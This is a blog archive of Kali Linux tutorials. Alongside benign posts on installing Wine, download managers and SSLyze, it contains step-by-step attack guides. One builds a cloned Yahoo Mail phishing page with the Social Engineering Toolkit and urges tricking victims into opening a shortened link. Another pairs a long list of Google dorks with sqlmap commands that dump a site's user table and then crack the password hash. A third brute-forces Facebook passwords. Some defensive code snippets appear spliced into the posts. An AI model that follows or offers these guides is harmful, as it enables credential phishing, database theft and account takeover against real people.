Showing posts with label Kali Tuterials. Show all posts

Tuesday, 31 May 2016

How to install Wine on Kali Linux and Debian 64 bit

To install Wine, we'll first enable multiarch, then update the system and finally install Wine. The commands to accomplish that are shown below.

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install wine:i386
sudo apt-get install wine-bin:i386
It will download the packages and install them. After the installation finishes, confirm that Wine has been installed successfully. Type:
wine --version
If you want an all-in-one command, here it is (each apt-get call needs its own sudo):
sudo dpkg --add-architecture i386 && sudo apt-get update && sudo apt-get install wine-bin:i386

Wednesday, 13 April 2016

Hacking Facebook with Kali

Steps for setting up your system.

  1. Download Kali Linux from here.
  2. Extract the contents of the Kali Linux ISO file you downloaded in step 1 and copy them to a pendrive, or burn the ISO file to a CD if you want to make a CD of it.
  3. After copying all the contents to the pendrive or burning the ISO file to a CD, reboot your system, press F8 at boot time and select boot from pendrive if you copied the files to a pendrive, or boot from CD-ROM if you burned the ISO file to a CD.
  4. After you select the boot device, the Kali installation window will open. Install according to your requirements.
  5. NOTE: During installation, set the mount point of the selected installation drive to "/".
  6. Remember the username and password you set during installation, as they will be necessary for this hacking method.
  7. Once installation is completed, the system will reboot. Log in to your account.
  8. Your system is ready for use.
The method we are using to hack the username and password or any user details is the Social Engineering Toolkit method.


Now lets set it up.

  • Open a terminal using Ctrl+Alt+T or click the small black window icon at the top left of your screen.
  • Once the terminal is open, type the command carefully.
su root
 Then enter your root username and password. Don't close the terminal.

  • The next step is to open the Social Engineering Toolkit. To do this, type the command below in the terminal.
se-toolkit

 You will see something in your terminal like the image below.
  • As in the image above, you will see the menu in your terminal. Press "1" and hit Enter, as we are going to do Social-Engineering Attacks. You will see something in the terminal like the image below.
  • Once again, you will get a menu as shown in the image above. We are going to select Website Attack Vectors, so press "2" and hit Enter. You will see something like the image below.
  • In this method we are going to get the credentials of the victim, so press "3" and hit Enter to select the Credential Harvester Attack Method. This opens a new menu as shown in the image below.
  • Since we want the username and password, which are the victim's credentials, we need to trap the victim on a page that looks like the original website's page (a phishing page), and for that we need to clone a website. To do this, press "2" and hit Enter, which will open something like the image below.
In the image above, you might have noticed a red rectangle that I drew. In that box you will find "tabnabbing:XXX.XX.XXX.X", where "XXX.XX.XXX.X" is your computer's IP address. To find the IP address of your computer, open a new terminal and type the commands given below.
su root
enter_your_root_password
ifconfig
In the commands above, we first gain root access and then type "ifconfig" and hit Enter to get the IP address.
Copy and paste this IP address at the end of "Tabnabbing:". I used my own IP address, but for security reasons I can't reveal it, so I have written "XXX.XX.XXX.X" here. Please note that if you don't enter your computer's IP address, this method won't work. After entering your IP address, hit Enter. It will ask you to enter the URL of the website you want to clone, as shown below. Here I entered "www.ymail.com", as I want to hack someone's ymail account. The image below shows all the steps.
It will give a message that it is working on cloning the site and that this will take a little time.
Once the process is completed, you will see something like the image below.
  • The next step is the most important one. Until now we have put your IP address online, and anyone who visits your IP address will see a page that looks like the website whose URL you entered to clone. In this step you need to shorten your IP address using services like ADF.LY, Binbox, Goo.gl, etc. Once you enter your IP address on these sites to shorten it, they will provide you with a link. All you need to do is send this shortened link to your victim.
  • When the victim visits the URL you sent them, they will see the same page as the one whose URL you entered to clone. The victim will think that it is the original page, and when the victim enters any of their information, you will see that information in the terminal.
  • In this example I used ymail.com, so the victim will see the homepage of Yahoo Mail. This is only the login form. I entered the login username as "Kali used to hack email-id and password" and the password as "Hacking successfull".

NOTE: The victim can identify that the page is a trap, as the address bar of the browser will show your IP address. For best results, send the shortened URL to the victim's mobile and ask them to visit it urgently, or you can tell them to visit this link and log in to get the latest updates on their favourite content, etc.

RESULT.

The username and password will be shown in terminal window and will be similar to the image shown below.

Monday, 15 February 2016

Kali Sana 2.0! Internet Download Manager, Aria2, Uget!



Hey guys, in this post I'm gonna show you all how to install an awesome download manager in Kali Sana 2.0! So, first of all, open the terminal and enter the following command as shown in the screenshot below.



This command will basically install aria2, the command-line download manager available for all Linux distros. Basically it's the dependency of our GUI software. You can use aria2 from the command line by just entering the command aria2c http://example.com/download/123.mp3, but in this post I'm gonna introduce you to this awesome open source GUI software, the uGet download manager. It's easy as fuck to install the uGet download manager: just enter the following command in the terminal, shown in the screenshot below.


so now aria2 and uget both are installed in your kali sana 2.0 .


and that's how uget download manager looks in kali sana 2.0.



Monday, 8 February 2016

Hacking Website With SQLMAP in Kali Linux

What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[Source: www.sqlmap.org]
Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone in a way you never wished for. I think I can’t make it any clearer.

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don’t, I have put together a number of strings that you can search for in Google. Just copy and paste any of the lines into Google and it will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list is really long. It took me a long time to collect them. If you know SQL, then you can add more here. Put them in the comment section and I will add them here.
Google Dork string Column 1 | Google Dork string Column 2 | Google Dork string Column 3
inurl:item_id= | inurl:review.php?id= | inurl:hosting_info.php?id=
inurl:newsid= | inurl:iniziativa.php?in= | inurl:gallery.php?id=
inurl:trainers.php?id= | inurl:curriculum.php?id= | inurl:rub.php?idr=
inurl:news-full.php?id= | inurl:labels.php?id= | inurl:view_faq.php?id=
inurl:news_display.php?getid= | inurl:story.php?id= | inurl:artikelinfo.php?id=
inurl:index2.php?option= | inurl:look.php?ID= | inurl:detail.php?ID=
inurl:readnews.php?id= | inurl:newsone.php?id= | inurl:index.php?=
inurl:top10.php?cat= | inurl:aboutbook.php?id= | inurl:profile_view.php?id=
inurl:newsone.php?id= | inurl:material.php?id= | inurl:category.php?id=
inurl:event.php?id= | inurl:opinions.php?id= | inurl:publications.php?id=
inurl:product-item.php?id= | inurl:announce.php?id= | inurl:fellows.php?id=
inurl:sql.php?id= | inurl:rub.php?idr= | inurl:downloads_info.php?id=
inurl:index.php?catid= | inurl:galeri_info.php?l= | inurl:prod_info.php?id=
inurl:news.php?catid= | inurl:tekst.php?idt= | inurl:shop.php?do=part&id=
inurl:index.php?id= | inurl:newscat.php?id= | inurl:productinfo.php?id=
inurl:news.php?id= | inurl:newsticker_info.php?idn= | inurl:collectionitem.php?id=
inurl:index.php?id= | inurl:rubrika.php?idr= | inurl:band_info.php?id=
inurl:trainers.php?id= | inurl:rubp.php?idr= | inurl:product.php?id=
inurl:buy.php?category= | inurl:offer.php?idf= | inurl:releases.php?id=
inurl:article.php?ID= | inurl:art.php?idm= | inurl:ray.php?id=
inurl:play_old.php?id= | inurl:title.php?id= | inurl:produit.php?id=
inurl:declaration_more.php?decl_id= | inurl:news_view.php?id= | inurl:pop.php?id=
inurl:pageid= | inurl:select_biblio.php?id= | inurl:shopping.php?id=
inurl:games.php?id= | inurl:humor.php?id= | inurl:productdetail.php?id=
inurl:page.php?file= | inurl:aboutbook.php?id= | inurl:post.php?id=
inurl:newsDetail.php?id= | inurl:ogl_inet.php?ogl_id= | inurl:viewshowdetail.php?id=
inurl:gallery.php?id= | inurl:fiche_spectacle.php?id= | inurl:clubpage.php?id=
inurl:article.php?id= | inurl:communique_detail.php?id= | inurl:memberInfo.php?id=
inurl:show.php?id= | inurl:sem.php3?id= | inurl:section.php?id=
inurl:staff_id= | inurl:kategorie.php4?id= | inurl:theme.php?id=
inurl:newsitem.php?num= | inurl:news.php?id= | inurl:page.php?id=
inurl:readnews.php?id= | inurl:index.php?id= | inurl:shredder-categories.php?id=
inurl:top10.php?cat= | inurl:faq2.php?id= | inurl:tradeCategory.php?id=
inurl:historialeer.php?num= | inurl:show_an.php?id= | inurl:product_ranges_view.php?ID=
inurl:reagir.php?num= | inurl:preview.php?id= | inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= | inurl:loadpsb.php?id= | inurl:transcript.php?id=
inurl:forum_bds.php?num= | inurl:opinions.php?id= | inurl:channel_id=
inurl:game.php?id= | inurl:spr.php?id= | inurl:aboutbook.php?id=
inurl:view_product.php?id= | inurl:pages.php?id= | inurl:preview.php?id=
inurl:newsone.php?id= | inurl:announce.php?id= | inurl:loadpsb.php?id=
inurl:sw_comment.php?id= | inurl:clanek.php4?id= | inurl:pages.php?id=
inurl:news.php?id= | inurl:participant.php?id=
inurl:avd_start.php?avd= | inurl:download.php?id=
inurl:event.php?id= | inurl:main.php?id=
inurl:product-item.php?id= | inurl:review.php?id=
inurl:sql.php?id= | inurl:chappies.php?id=
inurl:material.php?id= | inurl:read.php?id=
inurl:clanek.php4?id= | inurl:prod_detail.php?id=
inurl:announce.php?id= | inurl:viewphoto.php?id=
inurl:chappies.php?id= | inurl:article.php?id=
inurl:read.php?id= | inurl:person.php?id=
inurl:viewapp.php?id= | inurl:productinfo.php?id=
inurl:viewphoto.php?id= | inurl:showimg.php?id=
inurl:rub.php?idr= | inurl:view.php?id=
inurl:galeri_info.php?l= | inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue about which one is best, but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark).
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”
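Why the single-quote check in Step 1.b produces a database error, and the corresponding fix, as an added example that is not part of the original post. It uses an in-memory SQLite table with constructed rows; the function names and the handler's status mapping are assumptions made for illustration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO item VALUES (?, ?)",
                   [(15, "Blue mug"), (16, "Red mug")])
    return db


def lookup_concatenated(db, item_id):
    """Vulnerable: the request parameter becomes part of the SQL text."""
    sql = "SELECT title FROM item WHERE item_id = " + item_id
    return db.execute(sql).fetchall()


def lookup_parameterized(db, item_id):
    """Hardened: reject non-numeric input, then bind the value as data."""
    if not (item_id.isascii() and item_id.isdigit()):
        return None
    sql = "SELECT title FROM item WHERE item_id = ?"
    return db.execute(sql, (int(item_id),)).fetchall()


def handle_request(db, lookup, item_id):
    """Map a lookup to (HTTP status, body) without echoing driver errors."""
    try:
        rows = lookup(db, item_id)
    except sqlite3.Error:
        # Log the exception server-side; the client only sees a generic page,
        # so the error strings listed above never reach the browser.
        return 500, "Internal Server Error"
    if rows is None:
        return 400, "Bad Request"
    if not rows:
        return 404, "Not Found"
    return 200, "; ".join(title for (title,) in rows)


if __name__ == "__main__":
    db = make_db()
    # "15'" is the page's probe; "15 OR 1=1" shows the predicate being rewritten.
    for value in ("15", "15'", "15 OR 1=1"):
        print(repr(value),
              handle_request(db, lookup_concatenated, value),
              handle_request(db, lookup_parameterized, value))
```

With the concatenated query the trailing quote reaches the SQL parser and breaks the statement; with the bound parameter the same input is rejected as a malformed id and never becomes SQL.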

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a website vulnerable to SQLMAP SQL Injection. Now I need to list all the databases in that vulnerable database (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.
Run the following command against your vulnerable website.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases
See screenshot below.
This command reveals quite a bit of interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database for almost every MySQL database, so our interest would be in the sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for: the target columns user_login and user_password.

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes it easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there. We now only need the password for this user. The next step shows just that.

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to how the SQLMAP SQL Injection tool works. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
But hang on, this password looks funny. This can’t be someone’s password. Someone who leaves their website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password. What that means is that the password is encrypted and now we need to decrypt it.
I have covered how to decrypt passwords extensively in the post Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux. If you’ve missed it, you’re missing out on a lot.
I will cover it briefly here, but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. How do you know what type of hash that is?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. On the command line, type the following command and paste the hash value at the prompt:
hash-identifier
Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a computer that's got an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop I have an AMD ATI graphics card, so I will be using oclHashcat there. If you’re on VirtualBox or VMware, neither cudaHashcat nor oclHashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website; search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Interesting find: the usual Hashcat was unable to determine the code for the DES hash (it is not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
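What the quote check from Step 1.b and an sqlmap run look like from the server side, as an added detection example that is not part of the original post. The log lines are constructed (Apache combined format, documentation IP ranges), and the rule names and regular expressions are assumptions for illustration; the only tool-specific fact used is that sqlmap's default User-Agent begins with "sqlmap/".

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache "combined" format.
SAMPLE_LOG = """\
192.0.2.50 - - [08/Feb/2016:10:54:40 +0000] "GET /cgi-bin/item.cgi?item_id=16 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [08/Feb/2016:10:55:09 +0000] "GET /cgi-bin/item.cgi?item_id=15%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.23 - - [08/Feb/2016:10:55:50 +0000] "GET /cgi-bin/item.cgi?item_id=15%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.23 - - [08/Feb/2016:10:55:53 +0000] "GET /cgi-bin/item.cgi?item_id=15%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 4890 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A quote or SQL comment marker inside a parameter value. Expect false
# positives on free-text fields; apply to id-style parameters first.
METACHARS = re.compile(r"""['"]|--|/\*""")
# SQL syntax that has no business in an id-style parameter.
KEYWORDS = re.compile(
    r"(?i)\bunion\b.*\bselect\b|\binformation_schema\b"
    r"|\b(?:and|or)\s+\d+\s*=\s*\d+"
)


def classify(line):
    """Return (client_ip, set of rule names) for one log line, or None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    hits = set()
    if m.group("ua").lower().startswith("sqlmap/"):
        hits.add("sqlmap-default-user-agent")
    query = urlsplit(m.group("target")).query
    # parse_qsl percent-decodes, so %27 is seen as a literal quote.
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if METACHARS.search(value):
            hits.add("sql-metachar-in-param")
        if KEYWORDS.search(value):
            hits.add("sql-keyword-in-param")
    probing = hits - {"sqlmap-default-user-agent"}
    if probing and m.group("status").startswith("5"):
        # The probe reached the database layer and broke the query.
        hits.add("server-error-after-probe")
    return m.group("ip"), hits


def summarize(log_text):
    """Group the rules tripped by each client IP."""
    by_ip = defaultdict(set)
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            by_ip[parsed[0]] |= parsed[1]
    return {ip: sorted(rules) for ip, rules in by_ip.items()}


if __name__ == "__main__":
    for ip, rules in summarize(SAMPLE_LOG).items():
        print(ip, rules)
```

The "server-error-after-probe" rule is the one to alert on first: it means the input was not only suspicious but also changed what the database executed.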

Saturday, 6 February 2016

Installing XDM (alternate of IDM) in Kali

Install XDM by Direct Download

For those who use 32-bit:
Open Terminal and type:

wget http://sourceforge.net/projects/xdman/files/xdm-jre-32bit.tar.xz
tar -xvf xdm-jre-32bit.tar.xz

For those who use 64-bit:
Open Terminal and type:

wget http://sourceforge.net/projects/xdman/files/xdm-jre-64bit.tar.xz
tar -xvf xdm-jre-64bit.tar.xz
Once extracted, go to the xdm directory and execute the xdm file with the following commands:
cd xdm
./xdm
You can also double-click the xdm file to launch Xtreme Download Manager 2015.

 

Thursday, 4 February 2016

Fast and Full Featured SSL Scanner: SSLyze

 SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers.  SSLyze is all Python code but it uses an OpenSSL wrapper written in C called nassl, which was specifically developed for allowing SSLyze to access the low-level OpenSSL APIs needed to perform deep SSL testing.


Features:

  • Multi-processed and multi-threaded scanning: it’s very fast.
  • Support for all SSL protocols, from SSL 2.0 to TLS 1.2.
  • NEW: SSLyze can also be used as a library, in order to run scans and process the results directly from Python.
  • Performance testing: session resumption and TLS tickets support.
  • Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more.
  • Server certificate validation and revocation checking through OCSP stapling.
  • Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP.
  • Support for client certificates when scanning servers that perform mutual authentication.
  • And much more !


Getting Started

SSLyze can be installed directly via pip:
pip install sslyze
It is also easy to clone the repository directly and then fetch the requirements:
git clone https://github.com/nabla-c0d3/sslyze.git
cd sslyze
pip install -r requirements.txt --target ./lib
Then, the command line tool can be used to scan servers:
python sslyze_cli.py --regular www.yahoo.com:443 www.google.com
SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan.

Usage as a library

Starting with version 0.13.0, SSLyze can be used as a Python module in order to run scans and process the results directly in Python:
# Script to get the list of SSLv3 cipher suites supported by smtp.gmail.com
# Imports follow the module layout of the SSLyze 0.13.x API sample
from sslyze.plugins_finder import PluginsFinder
from sslyze.plugins_process_pool import PluginsProcessPool
from sslyze.server_connectivity import ServerConnectivityInfo, ServerConnectivityError
from sslyze.ssl_settings import TlsWrappedProtocolEnum

hostname = 'smtp.gmail.com'
try:
    # First we must ensure that the server is reachable
    server_info = ServerConnectivityInfo(hostname=hostname, port=587,
                                         tls_wrapped_protocol=TlsWrappedProtocolEnum.STARTTLS_SMTP)
    server_info.test_connectivity_to_server()
except ServerConnectivityError as e:
    raise RuntimeError('Error when connecting to {}: {}'.format(hostname, e.error_msg))

# Get the list of available plugins
sslyze_plugins = PluginsFinder()

# Create a process pool to run scanning commands concurrently
plugins_process_pool = PluginsProcessPool(sslyze_plugins)

# Queue a scan command to test which SSLv3 cipher suites the server accepts
plugins_process_pool.queue_plugin_task(server_info, 'sslv3')

# Process the result and print the accepted SSLv3 cipher suites
for server_info, plugin_command, plugin_result in plugins_process_pool.get_results():
    if plugin_result.plugin_command == 'sslv3':
        # Any cipher suite listed here means the server still accepts SSLv3
        print('SSLV3 cipher suites')
        for cipher in plugin_result.accepted_cipher_list:
            print('    {}'.format(cipher.name))

The scan commands are the same as the ones described in the sslyze_cli.py --help text.
They will all be run concurrently using Python’s multiprocessing module. Each command will return a PluginResult object with attributes that contain the result of the scan command run on the server (such as list of supported cipher suites for the --tlsv1 command). These attributes are specific to each plugin and command but are all documented (within each plugin’s module).


Saturday, 30 January 2016

Hack Facebook Account Password Using Brute Force Attack

The method I am going to use here is brute forcing, using the world’s best password dictionary, CrackStation.

So, first let's learn something about brute force attacks: “A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.”

But in our case I’ll be using a Python script and a long dictionary of passwords. I have personally tried it on myself and it really works.

Requirements

  • A Kali machine, or any Python engine will work!
  • Facebook.py (v1 or v2)
  • A Facebook ID, of course
  • CrackStation word list!


Now, let's start the work

Step 1. Install python-mechanize using the command below.
[*] root@root:~# apt-get install python-mechanize

Step 2. Add facebook.py using the commands below.
[*] root@root:~# chmod +x facebook.py
[*] root@root:~# python facebook.py

Step 3. Now enter the |Email| or |Phone number| or |Profile ID number| or |Username| of the victim.

Step 4. Now give the "path" of your CrackStation word list.

Step 5. Now it will try all the passwords present in the word list, so relax and have a cup of coffee, because it will take time depending on the speed of your processor and the password strength of your victim!
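How a login service blunts the word-list guessing described in steps 3 to 5, as an added example that is not part of the original post or of any real site's code. LoginThrottle, FakeClock and replay_wordlist are hypothetical names, the thresholds are assumed values, and the guesses are constructed; a simulated clock stands in for real time so the effect can be measured offline.

```python
import hmac
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Per-account failure counter with exponentially growing lockouts."""

    def __init__(self, max_failures=5, window=300.0, base_lock=60.0,
                 max_lock=3600.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window          # seconds over which failures are counted
        self.base_lock = base_lock    # first lockout length in seconds
        self.max_lock = max_lock
        self.clock = clock
        self._failures = defaultdict(deque)   # account -> recent failure times
        self._strikes = defaultdict(int)      # account -> lockouts so far
        self._locked_until = {}

    def allowed(self, account):
        """Check this BEFORE comparing the submitted password."""
        return self.clock() >= self._locked_until.get(account, 0.0)

    def record(self, account, success):
        now = self.clock()
        if success:
            self._failures.pop(account, None)
            self._strikes.pop(account, None)
            return
        recent = self._failures[account]
        recent.append(now)
        while now - recent[0] > self.window:
            recent.popleft()
        if len(recent) >= self.max_failures:
            self._strikes[account] += 1
            exponent = min(self._strikes[account] - 1, 16)
            lock = min(self.base_lock * 2 ** exponent, self.max_lock)
            self._locked_until[account] = now + lock
            recent.clear()


class FakeClock:
    """Simulated time source so the example runs instantly."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def replay_wordlist(throttle, clock, account, real_password, guesses,
                    seconds_per_guess=1.0):
    """Return (guesses that reached the password check, whether one matched)."""
    checked = 0
    for guess in guesses:
        clock.advance(seconds_per_guess)
        if not throttle.allowed(account):
            continue  # rejected without touching the stored credential
        checked += 1
        ok = hmac.compare_digest(guess.encode(), real_password.encode())
        throttle.record(account, ok)
        if ok:
            return checked, True
    return checked, False


if __name__ == "__main__":
    # Constructed word list: 999 wrong guesses, then the right one.
    words = ["guess%d" % i for i in range(999)] + ["correct horse"]
    clock = FakeClock()
    print(replay_wordlist(LoginThrottle(clock=clock), clock,
                          "victim@example.com", "correct horse", words))
```

Keying the counter on the account rather than the source address is what matters against a single-target word list; because it also lets anyone lock a known account, production systems pair it with per-source limits and a second factor.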

Saturday, 9 January 2016

Kali Basics

How to change the root password
root@bt:~# passwd
Enter new UNIX password: {enter your new password here}
Retype new UNIX password: {enter your new password again}
passwd: password updated successfully
root@bt:~#
How to start services
root@bt:~# /etc/init.d/openvpn start
Starting Virtual private network daemon(s)…
root@bt:~# /etc/init.d/openvpn stop

How to check kernel version
Use uname -a as shown below

Common Apt Commands
apt-get install <package>: Downloads <package> and all of its dependencies, and installs or upgrades them.
apt-get remove [--purge] <package>: Removes <package> and any packages that depend on it. --purge specifies that packages should be purged.
apt-get update: Updates package listings from the repo; should be run at least once a week.
apt-get upgrade: Upgrades all currently installed packages with those updates available from the repo; should be run once a week.
apt-get dist-upgrade [-u]: Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.
apt-cache search <pattern>: Searches packages and descriptions for <pattern>.
apt-cache show <package>: Shows the full description of <package>.
apt-cache showpkg <package>: Shows a lot more detail about <package>, and its relationships to other packages.
